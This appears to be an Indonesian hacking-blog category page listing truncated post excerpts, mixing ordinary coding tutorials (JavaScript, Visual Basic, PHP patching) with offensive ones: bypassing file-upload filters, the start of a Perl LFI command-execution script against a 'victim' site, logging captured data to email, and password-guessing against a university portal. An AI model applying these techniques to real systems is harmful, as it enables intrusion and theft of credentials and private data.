Coding

Ok semua.. Sekarang saya akan melanjutkan pembahasan Tentang PHP Arbitrary File Upload. Yang sebelumnya telah dibahas di: http://www.binushacker.net/php-arbitrary-file-upload-simple-patching.html Ok disana patchingnya emang ga terlalu bagus… Karena filetype bisa di manipulasi.. Bukan dengan merename shell.jpg.php tetapi dengan memanipulasi “header” file Cara membypassnya adalah sebagai berikut: Review codenya dulu Kalo kita coba …

Saya akan membahas tentang cara simple mempatch PHP Arbitrary File Upload. Kebanyakan website yang vuln diupload memiliki garis besar seperti ini: Contoh simple upload.php file upload. [crayon-5d37a5ca118a8101763898/] Contoh form yang dipake dalam file index untuk upload: [crayon-5d37a5ca118b7506964088/] Disini tidak ada code yang memfilter upload filetype. Jadi kita bisa langsung saja …

Script berikut untuk menjalankan/mengeksekusi LFI proc/elft/environ secara simple di shell. #! /usr/bin/perl use LWP; use HTTP::Request; if (@ARGV < 1) { print "\n==========================================\n"; print " LFI Command Execution \n"; print "==========================================\n"; print "Usage: perl LFI.pl (without http:://)\n"; print "Ex. perl FLI.pl www.korban.com/index.php?page=\n"; exit; } $host=$ARGV[0]; $lfi = "..%2F..%2F..%2F..%2F..%2F..%2Fproc%2Fself%2Fenviron"; print "Try …

Apa kabar semuanya 😀 Berikut ini gw mau jelasin trik yang sangat menarik buat anda pelajarin. Merupakan sebuah logging informasi data yang masuk, dan kemudian dikirim ke email kita. Ini sempet dibahas di BinusHacker Hack Show 30 Mei 2009 di #BinusHacker @Irc.Dal.Net Lets begin! Memaksimalkan Fungsi Email = Hacking is …

Setelah terampungkan script php yang telah kita buat ada kalanya bug-bug yang tidak diinginkan bercokol di sela-sela script yang telah siap dionlinekan. Dan tentunya bug ini bisa berakibat fatal sehingga dapat dimanfaatkan oleh para intruder-intruder yang berusaha untuk mengekploitasi system.   Dan siapa sangka script php yang telah dibuat itu …

< !DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <title>Contoh Latihan  Javascript :: Check & Uncheck All</title> </head> <script type=”text/javascript”> function Check(){ //Ambil semua elemen dalam id formCheck allCheckList = document.getElementById(“formCheck”).elements; //Hitung banyaknya elemen jumlahCheckList = allCheckList.length; //Jika tombolCheck bernilai “Check All” …

Sekarang kita mencoba belajar Database visual basic, yaitu database dengan menggunakan Microsoft Office Acces sebagai sumber datanya. Kita akan membuat sebuah aplikasi sederhana “Koleksi Bukuku” yang berfungsi untuk menyimpan daftar koleksi buku yang mungkin sangat banyak dan kita belum sempat melakukan inventarisasi terhadapnya.Saya sendiri sempat terkejut pada saat saya membuat …

kemaren sempet baca hack binusmaya jadi tertarik bikin juga tapi pake python n sayang nya ni cuma bisa di jalani di linux bagi pngguna windows pake cygwin ya cara kerjanya sedikit beda dg tutorial sebelumnya kita siapin dolo beberapa kata yg mungkin menjadi password si binusian habis itu simpen kata …

Dibawah ini merupakan Kumpulan tutorial singkat Blogspot dan beberapa Blogger Hack yang paling sering ditanyakan. Sengaja saya tidak membuat tulisan per-artikel mengingat penjelasannya terlalu singkat dan terbilang sederhana. Nah..untuk menjawab pertanyaan yang sama dan sering pada komentar dan Imel yang masuk saya kumpulkan aja jadi satu. Silahkan dicoba 🙂 Agar …

Wah, ini cerita yang sempat gempar loh :)) Bagaimana seorang teman yang ingin melihat hasil nilai temennya gak di kasi tau. A: “Woi, berape nilai loe?? Kasi tau gw donk.. Pelit amat loe.” B: “Mo tau ajah loe, rahasia donk..” C: “Agh kasi tau ajah lah.. Gw juga ni, gw …